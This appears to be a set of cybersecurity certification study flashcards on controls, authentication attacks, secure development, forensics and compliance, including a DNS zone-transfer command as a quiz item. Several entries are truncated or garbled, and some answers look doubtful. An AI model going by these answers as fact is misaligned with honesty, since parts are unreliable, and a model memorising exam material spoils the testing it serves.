The ______________ is designed to help organizations describe their current cybersecurity posture, describe their target state for cybersecurity, identify and prioritize opportunities for improvement, assess progress, and communicate with stakeholders about risk.
NIST Cybersecurity Framework
Shelly is writing a document that describes the steps that incident response teams will follow upon first notice of a potential incident. What type of document is she creating?
procedure
______________ provide checklist-style sets of step-by-step instructions guiding how employees should react in a given circumstance and commonly guide the early stages of incident response.
Procedures
Sue is a manager of a group of system administrators and is in charge of approving all requests for administrative rights. In her role, she files a change request to grant a staff member administrative rights and then approves it. What personnel control would best help to prevent this abuse of her role?
separation of duties
Ben wants to ensure that a single person cannot independently access his organization's secure vault. What personnel control is best suited to this need?
dual control
Lauren's departure from her organization leaves her team without a Linux systems administrator and means they no longer have in-depth knowledge of a critical business system. What should her manager have done to ensure that this issue did not have a significant impact?
succession planning
Rick is reviewing his organization's network design and is concerned that a known flaw in the border router could let an attacker disable their Internet connectivity. Which of the following is an appropriate compensatory control?
an alternate Internet connectivity method using a different router type
Fred has been assigned to review his organization's host security policies due to a recent theft of a workstation that contained sensitive data. Which of the following controls would best help to prevent a stolen machine from causing a data breach?
full disk encryption
_________________ is useful for reporting machine state and might even help locate a machine if it is reconnected to a network, but it does not protect the data a machine contains.
Central management
Full disk encryption protects sensitive data on a workstation in the event of theft. _________________ would provide helpful additional capabilities, but both rely on the system connecting to a network after it is stolen.
remote wipe capabilities and machine tracking software
A member of Susan's team recently fell for a phishing scam and provided his password and personal information to a scammer. What layered security approach is not an appropriate layer for Susan to implement to protect her organization from future issues?
multi-tiered firewalls
In the event a scammer acquired passwords and personal information, _________________ would require the attacker to have the second factor in addition to the password.
multifactor authentication
Chris is in charge of his organization's Windows security standard, including their Windows XP security standard, and has recently decommissioned the organization's last Windows XP system. What is the next step in his security standard's life cycle?
retiring the Windows XP standard
Retirement is the last step at the end of the life cycle for a standard or process. This means that if the process is retired, a _________________ is not needed.
final update
Example Corporation has split their network into network zones that include sales, HR, research and development, and guest networks, each separated from the others using network security devices. What concept is Example Corporation using for their security network?
segmentation
Zoned routing is a _________________.
made-up term
Which of the following layered security controls is commonly used at the WAN, LAN, and host layer in a security design?
firewalls
_________________ are commonly used to create network protection zones, to protect network borders, and at the host level to help armor the host against attacks.
Firewalls
_________________ at rest is most frequently used at the host layer.
Encryption
_________________ are typically used at the edge of a network for publicly accessible services.
DMZs
In Lauren's initial design for a secure network, she applied the same security controls to every system and network. After reviewing her design, she decided to isolate systems based on their functions and to apply controls to protected network segments for more sensitive data and systems. What two design models did she apply?
uniform protection and protected enclaves
An _________________ design would have applied protections based on information classification or control requirements.
information-based
Michelle has been asked to review her corporate network's design for single points of failure that would impact the core network operations. This is a redundant network design with a critical fault: a single point of failure that could take the network offline if it failed. What could be the single point of failure?
the internet access connected directly to the ISP
During a penetration test of Anna's company, the penetration testers were able to compromise the company's web servers and deleted their log files, preventing analysis of their attacks. What compensating control is best suited to prevent this issue in the future?
sending logs to a syslog server or bastion host
Which of the following controls is best suited to prevent vulnerabilities related to software updates?
centralized patch management software
Ben's organization uses data loss prevention software that relies on metadata tagging to ensure that sensitive files do not leave the organization. What compensating control is best suited to ensuring that data that does leave is not exposed?
encryption of all files sent outside the organization
James is concerned that network traffic from his datacenter has increased and that it may be caused by a compromise that his security tools have not identified. What SIEM analysis capability could he use to look at the traffic over time sent by his datacenter systems?
trend analysis
Angela needs to implement a control to ensure that she is notified of changes to important configuration files on her server. What type of tools should she use for this control?
file integrity checking
File integrity checking tools like _________________ can notify an administrator when changes are made to a file or directory.
Tripwire
Mike installs a firewall in front of a previously open network to prevent the systems behind the firewall from being targeted by external systems. What did Mike do?
reduced the organization's attack
During a security architecture design review, Kathleen notices that there is no written process in place to ensure that systems are returned to their normal state after a compromise. How would this control be classified?
an administrative, corrective control
Sarah's design for network security is set up where three networks (Business Confidential Network, Highly Sensitive Network, and Public Network) each have a separate firewall and are connected to a single router. What design model has she used for her network?
information-based design
Lauren is designing a multifactor authentication system for her company. She has decided to use a passphrase, a time-based code generator, and a PIN to provide additional security. How many distinct factors will she have implemented when she is done?
two
Lauren is designing a multifactor authentication system for her company. She has decided to use a passphrase, a time-based code generator, and a PIN to provide additional security. She has implemented two distinct factors in her design. If she wanted to add a third factor, what could she do?
replace either the password or PIN with a fingerprint scan or other biometric factor
What technology is best suited to protecting LDAP authentication from compromise?
TLS
LDAP authentication occurs in _________________, requiring TLS to protect the communication process.
plaintext
During an incident response process, Michelle discovers that the administrative credentials for her organization's Kerberos server have been compromised and that attackers have issued themselves a ticket without an expiration date. What is this type of ticket called?
a golden ticket
A _________________ is a Kerberos key distribution center.
KDC
Which of the following technologies is NTLM associated with?
Active Directory
Jim was originally hired into the helpdesk at his current employer but has since moved into finance. During a rights audit, it is discovered that he still has the ability to change passwords for other staff members. What is this issue called?
privilege creep
What type of attack occurs when an attacker takes advantage of OAuth open redirects to take on the identity of a legitimate user?
impersonation
OAuth redirect exploits are a form of _________________, allowing attackers to pretend to be a legitimate user.
impersonation attack
_________________ takes advantage of existing sessions.
Session hijacking
_________________ attacks take advantage of being in the path of communications.
MITM
_________________ is a networking term used when reviewing packet contents.
Protocol analysis
2013's Yahoo breach resulted in almost 1 billion MD5 hashed passwords being exposed. What user behavior creates the most danger when this type of breach occurs?
password reuse
Authentication that uses the IP address, geographic location, and time of day to help validate the user is known as what type of authentication?
context based
_________________ allows authentication decisions to be made based on information about the user, the system they are using, or other data like their geographic location, behavior, or even time of day.
context-based authentication
_________________ uses a security token to generate a one-time password or value.
token-based authentication
Which of the following is not a common attack against Kerberos?
open redirect-based attacks
Common attacks against _________________ include attacks aimed at administrative accounts, particularly those that attempt to create a ticket granting ticket and ticket reuse attacks.
Kerberos
Which of the following technologies is not a shared authentication technology?
LDAP
_________________ is sometimes used for single sign-on but is not a shared authentication technology.
LDAP
OpenID Connect, OAuth, and Facebook Connect are all examples of _________________.
shared authentication technologies
Angela is concerned about attackers enumerating her organization's LDAP directory. What LDAP control should she recommend to help limit the impact of this type of data gathering?
ACLs
_________________ may help with load issues or denial-of-service attacks.
LDAP replication
TACACS+?
route management traffic over a dedicated network
_________________ should be run on an isolated management network to protect it from attackers.
TACACS+
Jason has user rights on his Linux workstation, but he wants to read his department's financial reports, which he knows are stored in a directory that only administrators can access. He executes a local exploit, which gives him the ability to act as root. What type of attack is this?
privilege escalation
Chris is responsible for monitoring his organization's file shares and security and has discovered that employees are consistently retaining access to files after they change positions. Where in the organization's account life cycle should he focus his efforts?
Step 3 Modify and Maintain Account
_________________ is the first step in an account life cycle.
Create account and set password
_________________ is the second step in an account life cycle.
Provision to services and set initial rights and roles
_________________ is the third step in an account life cycle.
Modify and maintain account
_________________ is the fourth step in an account life cycle.
Disable account
_________________ is the fifth and final step in an account life cycle.
Retire and deprovision account
Which of the following methods is not an effective method for preventing brute-force password guessing attacks via login portals?
returning an HTTP error
CAPTCHAs, login throttling, and locking out accounts after a set number of failed logins are all useful techniques to stop or delay _________________ password guessing attacks.
brute-force
Which party in a federated identity service model makes assertions about identities to service providers?
identity providers (IDPs)
Which of the following reasons is not a reason to avoid using SMS as a second factor for authentication?
SMS cannot send unique tokens
NIST SP 800-63-3 recommends that _________________ be deprecated due to issues with VoIP including password reuse and the ability to redirect SMS sent via VoIP calls. It is also relatively insecure, allowing attackers with the right equipment to potentially intercept it.
SMS
Ben's successful attack on an authenticated user required him to duplicate the cookies that the web application put in place to identify the legitimate user. What type of attack did Ben conduct?
session hijacking
What types of attack can be executed against a RADIUS shared secret if attackers have valid credentials including a known password and can monitor RADIUS traffic on the network?
brute force attack
_________________ attempts to reuse previously used hashes to authenticate.
pass-the-hash
_________________ shared secrets can be brute forced if attackers can gain access to a known password and can monitor traffic on the network.
RADIUS
Michelle has a security token that her company issued to her. What type of authentication factor does she have?
Possession
Angela's software development team is working on a large-scale control package that will run a nuclear power plant for multiple decades. They want to select a software development life cycle (SDLC) that fits their needs, which includes careful up-front planning and analysis, without any anticipated change during the coding process. What SDLC model should she choose?
waterfall
Which of the following options is the most likely used for the host listed in the dhcpd.conf entry?
host db1 {
  option host-name "sqldb1.example.com";
  hardware ethernet 8a:00:83:aa:21:9f;
  fixed-address 10.1.240.10;
}
Microsoft SQL server
What technique is being used in this command?
dig axfr @dns-server example.com
zone transfer
In incident response, ______________ would typically contain:
* identifying information
  - location
  - serial number
  - model number
  - hostname
  - MAC addresses and IP addresses of a computer
* the name, title, and phone number of each individual who collected or handled the evidence during the investigation
* the time and date (including time zone) of each occurrence of evidence handling
* the locations where the evidence was stored.
an evidence log
During her forensic copy validation process Danielle received the following MD5 sums from her original drive and the clone image after using dd. What is likely wrong?
b4979e007e909c00a51ae208cacb169 original.img
d9ff8a0cf6bc0ab066b6416e7eabf35 clone.img
an unknown change or problem occurred
During a Fagan code inspection, which process can redirect to the planning stage?
rework
During the rework stage of the Fagan inspection, issues may be identified that require the process to return to the _____________ stage and then proceed back through the remaining stages to re-review the code.
planning
Adam is conducting software testing by reviewing the source code of the application. What type of code testing is Adam conducting?
static code analysis
While conducting software testing, mutation testing and fuzzing are types of _____________.
dynamic analysis
Adam is conducting software testing by running the program. What type of testing is Adam conducting?
dynamic code analysis
After a major patch is released for the web application that he is responsible for, Sam proceeds to run his web application security scanner against the web application to verify that it is still secure. What is the term for the process Sam is conducting?
regression testing
Conducting a _____________ verifies that changes have not introduced new issues to an application.
regression test
How many phases does the Spiral model cycle through?
four
The _____________ cycles through four phases: requirements gathering, design, build, and evaluation/risk analysis.
Spiral model
Charles is worried about users conducting SQL injection attacks. Which of the following solutions will best address his concerns?
performing user input validation
Charles should perform user input validation to strip out any _____________ or other unwanted input.
SQL code
_____________ management can help prevent session hijacking.
Secure Session
_____________ may provide useful information for incident investigation.
logging
Susan's team has been writing code for a major project for a year and recently released their third version of the code. During a post-implementation regression test, an issue that was originally seen in version 1 reappeared. What type of tool should Susan implement to help avoid this issue in the future?
source control management
A source control management tool like _____________ can help prevent old code from being added to current versions of an application.
Subversion or Git
Susan's team has been writing code for a major project for a year and recently released their third version of the code. During a post-implementation regression test, an issue that was originally seen in version 1 reappeared. What type of process should Susan implement to help avoid this issue in the future?
pair programming
Precompiled SQL statements that only require variables to be input are an example of what type of application security control?
parameterized queries
A parameterized query, sometimes called a _____________, uses a prebuilt SQL statement to prevent SQL-based attacks. Variables from the application are fed to the query, rather than building a custom query when the application needs data.
prepared statement
Input validation and encoding data helps to prevent _____________ attacks.
cross-site scripting
What process checks to ensure that functionality meets customer needs?
user acceptance testing (UAT)
_____________ is the process of testing to ensure that the users of the software are satisfied with its functionality.
User acceptance testing (UAT)
_____________ validates individual components of the application.
unit testing
_____________ verifies that the application will perform when under high load or other stress.
stress testing
What Agile process is used to determine whether application development is occurring at the speed that was expected?
velocity tracking
_____________ calculates the actual speed based on accomplishments versus the estimated work from the sprint planning effort.
Velocity tracking
In Agile development, _____________ is used to limit the time spent on an effort, by using a previously agreed-upon time that a person or team uses to work on a specific goal. This limits the time to work on a goal rather than allowing work until completion. At the end, the completed work is assessed to determine what needs to occur next.
timeboxing
In Agile development, _____________ are lists of features or tasks that are required to complete a project.
backlogs
In Agile development, _____________ is a tool for estimation and planning used in development processes. Estimators are given cards with values for the amount of work required for a task. Estimators are asked to estimate, and each reveals their "bid" on the task. This is done until an agreement is reached, with the goal to have estimators reach the same estimate through discussion.
planning poker
In Agile development, _____________ are collected to describe high-level user requirements. An example may be "Users can change their password via a mobile app" which would provide direction for estimation and planning for an Agile work session.
user stories
In Agile development, _____________ is conducted by adding up the estimates for the current sprint's effort and then comparing that to what was completed. This tells the team whether they are on track, faster, or slower than expected.
velocity tracking
Using TLS to protect application traffic helps satisfy which of the OWASP 2016 best practices?
protect data
_____________ satisfies the "protect data" OWASP 2016 best practice by ensuring that network traffic is secure.
TLS
Kristin wants to implement code review but has a distributed team that works at various times during the day. She also does not want to create any additional support load for her team with new development environment applications. What type of review process will work best for her needs?
pass-around
_____________ normally rely on email to move code between developers.
pass-around reviews
_____________ require implementation of a tool to specifically support the review.
tool-assisted reviews
_____________ reviews require developers to work together.
pair programming and over-the-shoulder
Waterfall and Spiral use _____________ processes.
linear
Agile software development is an _____________ process.
iterative and incremental
During the _____________ phase, gathering user stories and design would be a part of the process.
sprint planning
Using the Agile sprint process, what step will occur at step two?
development
When is the Agile sprint complete?
when customers agree that the task is done or the time allocated for the sprint is complete
What process is used to ensure that an application can handle very high numbers of concurrent users or sessions?
load testing
Fuzzing, mutation testing, and fault injection are all types of _____________.
code review and testing
Lauren wants to insert data into the response from her browser to a web application. What type of tool should she use if she wants to easily make manual changes in what her browser sends out as she interacts with the website?
interception proxy
_____________ are designed to allow testers to intercept, view, and modify traffic sent from web browsers and are often used for penetration testing and web application security testing.
interception proxies
_____________ are used for application testing by sending invalid data to the application.
fuzzers
What type of testing focuses on inserting problems into the error handling processes and paths in an application?
fault injection
_____________ describes any type of live application testing.
dynamic code analysis
What type of code review requires two programmers, one of whom explains their code to the other developer?
over-the-shoulder
The difference between over-the-shoulder code review and _____________ is that over-the-shoulder review requires two programmers, one of whom explains their code to the other; the latter also uses two developers but lets them swap roles between writing code and observing and strategizing.
pair programming
What term is used to describe high-level requirements in Agile development efforts?
user stories
After running an nmap scan of a system, you receive scan data that indicates the following three ports are open: 22/TCP, 443/TCP, and 1521/TCP. What services commonly run on these ports?
SSH, HTTPS, Oracle
Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of footprinting or reconnaissance?
whois
What type of system allows attackers to believe they have succeeded with their attack, thus providing defenders with information about their attack methods and tools?
honeypot
What cybersecurity objective could be achieved by running your organization's web servers in redundant, geographically separate datacenters?
availability
Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
authenticated
An authenticated or _________________ scan provides the most detailed view of the system.
credentialed
In early 2017, a flaw was discovered in the Chakra JavaScript scripting engine in Microsoft's Edge browser that could allow remote execution or denial of service via a specially crafted website. The CVSS 3.0 score for this reads: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H. What is the attack vector and the impact to integrity based on this rating?
Network, High
Alice is a security engineer tasked with performing vulnerability scans for her organization. She encounters a false positive error in one of her scans. What should she do about this?
verify that it is a false positive and then document the exception
Which phase of the incident response process is most likely to include gathering additional evidence such as information that would support legal action?
containment, eradication and recovery phase
Which of the following descriptions explains an integrity loss?
sensitive or proprietary information was changed or deleted
Which of the following techniques is an example of active monitoring?
ping
RMON and NetFlow are examples of _________________ monitoring.
router-based
_________________ allow passive monitoring.
network taps
Ben's monitoring detects regular traffic sent from a system that is suspected to be compromised and participating in a botnet to a set of remote IP addresses. What is this called?
beaconing
Which of the following tools is not useful for monitoring memory usage in Linux?
df
Which Linux commands can show information about memory usage?
top, ps, and free
In Linux, the _________________ command is used to show the amount of free and used disk space.
df
Which of the following tools cannot be used to make a forensic disk image?
xcopy
FTK, EnCase, and dd all provide options that support their use for _________________.
forensic disk image creation
During a forensic investigation, Shelly is told to look for information in slack space on the drive. Where should she look, and what is she most likely to find?
She should look at unused space left when a file is written, and she is likely to find file fragments from deleted files.
What type of system is used to contain an attacker to allow them to be monitored?
a sandbox
Bob's manager has asked him to ensure that a compromised system has been completely purged of the compromise. What is Bob's best course of action?
wipe and rebuild the system
What level of secure media disposition as defined by NIST SP 800-88 is best suited to a hard drive from a high-security system that will be reused in the same company by an employee of a different level or job type?
purge
A statement like "Windows workstations must have the current security configuration template applied to them before being deployed" is most likely to be part of which document?
standards
_________________ contain high-level statements of management intent.
policies
_________________ provide mandatory requirements for how policies are carried out.
standards
A _________________ would include the step-by-step process.
procedure
A _________________ describes a best practice or recommendation.
guideline
Jim is concerned with complying with the U.S. federal law covering student educational records. Which of the following laws is he attempting to comply with?
Family Educational Rights and Privacy Act (FERPA)
_________________ requires educational institutions to implement security and privacy controls for student educational records.
Family Educational Rights and Privacy Act (FERPA)
_________________ covers security and privacy for healthcare providers, health insurers, and health information clearinghouses.
HIPAA
_________________ covers financial institutions.
GLBA
_________________ applies to financial records of publicly traded companies.
SOX
A fire suppression system is an example of what type of control?
physical
_________________ are technical controls that enforce confidentiality, integrity, and availability.
logical controls
_________________ are procedural controls.
administrative controls
Lauren is concerned that Danielle and Alex are conspiring to use their access to defraud their organization. What personnel control will allow Lauren to review their actions to find any issues?
separation of duties
Joe wants to implement an authentication protocol that is well suited to untrusted networks. Which of the following options is best suited to his needs in its default state?
Kerberos
_________________ is designed to run on untrusted networks and encrypts authentication traffic by default.
Kerberos
As authentication protocols, _________________ can be encrypted but are not necessarily encrypted by default.
LDAP and RADIUS
It is recommended that _________________ be run only on isolated administrative networks as an authentication protocol.
TACACS+
Which software development life cycle model uses linear development concepts in an iterative, four-phase process?
Spiral
The Spiral model uses linear development concepts like those used in _________________, but repeats four phases through its life cycle: requirements gathering, design, build, and evaluation.
Waterfall